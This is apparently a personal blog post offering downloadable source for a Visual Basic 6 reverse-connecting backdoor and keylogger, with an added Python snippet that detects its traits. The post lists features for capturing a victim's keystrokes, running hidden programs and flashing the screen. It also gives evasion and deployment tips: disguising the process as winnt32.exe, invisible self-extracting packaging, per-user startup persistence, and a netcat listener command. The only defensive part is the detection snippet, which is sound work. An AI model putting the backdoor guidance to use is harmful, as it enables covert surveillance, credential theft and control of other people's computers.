
Primitive Backdoor in Visual Basic 6 (VB6)

A reverse connecting backdoor plus keylogger written in Visual Basic 6
By 28/12/10 [Last Edited by Joseph 28/01/11]
This backdoor is pretty primitive, but it works! Also, it hasn't been hassled by any anti-virus software that I've tested it on, as yet! Made this a while back just to see if I could! Not bad for a pile of poorly written code in an ancient programming language!

Features

  • The backdoor sends back all alphanumeric keystrokes (i.e. everything the user types on the keyboard) in near real time from the user's computer to the attacker running netcat
  • The attacker can send commands to the backdoor running on the user's computer by using netcat, commands include:
    • popup*Your Message Here - Shows a message box to the user
    • bsod*0 - Full screen flashing black & white, fast! Could cause a fit?!
    • shell*path\to\whatever.exe - Execute something hidden on the user's machine
    • shellshow*path\to\whatever.exe - Execute something non-hidden
    • end*0 - Shutdown the backdoor
  • Shows the attacker the machine name, domain and the user which the backdoor is being run under

Things to be aware of

  • A firewall may block outbound port 5489; Windows Firewall asks the user if they'd like to give winnt32.exe permission to access the internet, unfortunately
  • The machine to connect to is statically defined in the code (currently 127.0.0.1, the same computer [loopback])
  • MSWINSCK.OCX must be present in a default search path, such as the Windows directory or the same directory as the backdoor. You could make a self-extracting EXE with all the files, using Chilkat Zip2SecureEXE [there is an option to make it extract totally invisibly]
  • It's only called winnt32.exe to confuse people if they try and kill it from the processes list in task manager
  • No UAC or non-administrator problems unless for some reason MSWINSCK.OCX needs to be registered through regsvr32 or you try to touch registry keys under HKEY_LOCAL_MACHINE to get it to run on startup for all users (use HKEY_CURRENT_USER, usually each person has their own computer these days!)
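
Seen from the defending side, the traits listed above (the winnt32.exe image name, outbound TCP 5489, and MSWINSCK.OCX sitting beside the executable) are weak signals on their own but a strong one together. The following is an added example, not part of the original post or its download: it correlates those traits over constructed endpoint events, and the event schema, host names, paths and addresses are assumptions made for the illustration.

```python
# Added example: correlate constructed endpoint events against the traits the
# page lists. The event schema (dict keys) is an assumption, not a real log format.
import ntpath

BACKDOOR_PORT = 5489           # outbound port named on the page
DISGUISE_NAME = "winnt32.exe"  # process name named on the page
WINSOCK_OCX = "mswinsck.ocx"   # Winsock control the backdoor needs

def indicators(event):
    """Return the page-derived indicators matched by a single event."""
    hits = set()
    image = event.get("image", "").lower()
    if ntpath.basename(image) == DISGUISE_NAME:
        hits.add("image-name")
    if (event["type"] == "net" and event.get("direction") == "outbound"
            and event.get("dport") == BACKDOOR_PORT):
        hits.add("outbound-5489")
    if event["type"] == "module":
        module = event.get("module", "").lower()
        # OCX shipped next to the executable instead of a system directory
        if (ntpath.basename(module) == WINSOCK_OCX
                and ntpath.dirname(module) == ntpath.dirname(image)):
            hits.add("ocx-beside-exe")
    return hits

def triage(events, threshold=2):
    """Flag a (host, image) pair once it matches `threshold` distinct indicators."""
    seen = {}
    for ev in events:
        key = (ev["host"], ev.get("image", "").lower())
        seen.setdefault(key, set()).update(indicators(ev))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}

# Constructed sample events (hosts, paths and addresses are made up).
SAMPLE_EVENTS = [
    {"host": "ws-01", "type": "module", "image": r"C:\Users\amy\AppData\winnt32.exe",
     "module": r"C:\Users\amy\AppData\MSWINSCK.OCX"},
    {"host": "ws-01", "type": "net", "image": r"C:\Users\amy\AppData\winnt32.exe",
     "direction": "outbound", "dport": 5489, "dst": "192.0.2.10"},
    {"host": "ws-02", "type": "net", "image": r"C:\Apps\sync\sync.exe",
     "direction": "outbound", "dport": 5489, "dst": "192.0.2.77"},
    {"host": "ws-03", "type": "module", "image": r"C:\Apps\legacy\ledger.exe",
     "module": r"C:\Windows\System32\MSWINSCK.OCX"},
]

if __name__ == "__main__":
    for (host, image), hits in triage(SAMPLE_EVENTS).items():
        print(host, image, hits)
```

Requiring two distinct indicators keeps the unrelated program that happens to use port 5489 (ws-02) and the legacy application loading the OCX from a system directory (ws-03) out of the results.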

NetCat

You can set up netcat to listen for connections using the command: nc -L -p 5489 (remember, if you're doing this over the internet, you may need to forward port 5489 on your router).

Disclaimer

Under no circumstance am I endorsing criminal activity, this code is only permitted for use in an educational context. Anyhow, if you are intending to cause criminal damage with this code, you'll get caught quickly (your IP/host right in the source code remember! All that needs to happen is someone decompile the application and have a look at the string table...).

Download

Download Visual Basic 6 source: Backdoor2

Screenshot

As you can see here, anything which is typed on the user's computer is sent to the attacker's machine (the user's machine in this example is also the attacker's machine: yes, that is possible, but obviously is not how it would be used in a real-world situation; it is just for ease of taking a screenshot!).